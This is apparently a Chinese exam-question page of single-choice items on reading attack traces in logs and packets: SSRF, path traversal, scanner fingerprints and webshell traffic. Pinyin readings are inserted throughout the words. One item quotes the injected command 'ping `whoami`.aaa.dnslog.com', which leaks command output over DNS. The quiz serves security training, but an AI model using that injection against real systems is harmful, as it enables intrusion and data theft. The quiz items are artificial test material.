單項選擇題當(dāng)日志中頻繁出現(xiàn)內(nèi)網(wǎng)IP地址,如127.0.0.1,192.168.1.1等,可能是攻擊者進(jìn)行什么漏洞嘗試()
A.SSRF漏洞攻擊
B.代碼執(zhí)行漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.任意文件讀取
您可能感興趣的試卷
你可能感興趣的試題
1.單項選擇題請求url為/env,/actuator/env字樣,可以判斷出后端使用的是()
A.Weblogic
B.Tomcat
C.Apache
D.Springboot
2.單項選擇題攻擊數(shù)據(jù)包中出現(xiàn)多個"../"字樣,則最有可能是攻擊者進(jìn)行哪項漏洞攻擊()
A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.任意文件讀取
3.單項選擇題網(wǎng)絡(luò)攻擊數(shù)據(jù)包中,存在"Acunetix"字樣,可以判斷出此款漏掃掃描器為()
A.AppScan
B.Awvs
C.xray
D.burp
4.單項選擇題網(wǎng)絡(luò)數(shù)據(jù)包中出現(xiàn)ping `whoami`.aaa.dnslog.com,攻擊者最有可能的目的是哪項()
A.xss漏洞攻擊
B.單純執(zhí)行ping命令
C.把whoami命令執(zhí)行結(jié)果,通過dns域名顯示出來
D.SQL注入漏洞攻擊
5.單項選擇題網(wǎng)絡(luò)數(shù)據(jù)包中出現(xiàn)新增jsp、php、aspx腳本語言文件的加密流量,說明攻擊者有可能正在進(jìn)行哪項操作()
A.正常請求訪問
B.連接webshell進(jìn)行服務(wù)器操作
C.漏洞掃描
最新試題
下面對于WindowsDNS日志功能的說法,其中錯誤的是()
題型:單項選擇題
下列哪種安全評估類型定期檢查系統(tǒng)的安全性并提出建議()
題型:單項選擇題
下列哪種備份類型備份所有更改的文件()
題型:單項選擇題
下列哪種類型的攻擊利用用戶的會話信息來冒充合法用戶()
題型:單項選擇題
下列哪種安全措施可防止惡意軟件感染計算機(jī)()
題型:單項選擇題
安全策略實施的步驟包括()
題型:多項選擇題
以下最有效的防范上傳漏洞的方式是什么()
題型:單項選擇題
在PKI系統(tǒng)中,受理、錄入、審核并批準(zhǔn)或否決用戶的證書申請(或廢除請求)的機(jī)構(gòu)稱為是()
題型:單項選擇題
魚叉式網(wǎng)絡(luò)釣魚主要有哪幾種類型()
題型:多項選擇題
有效的網(wǎng)絡(luò)安全政策應(yīng)包括()
題型:多項選擇題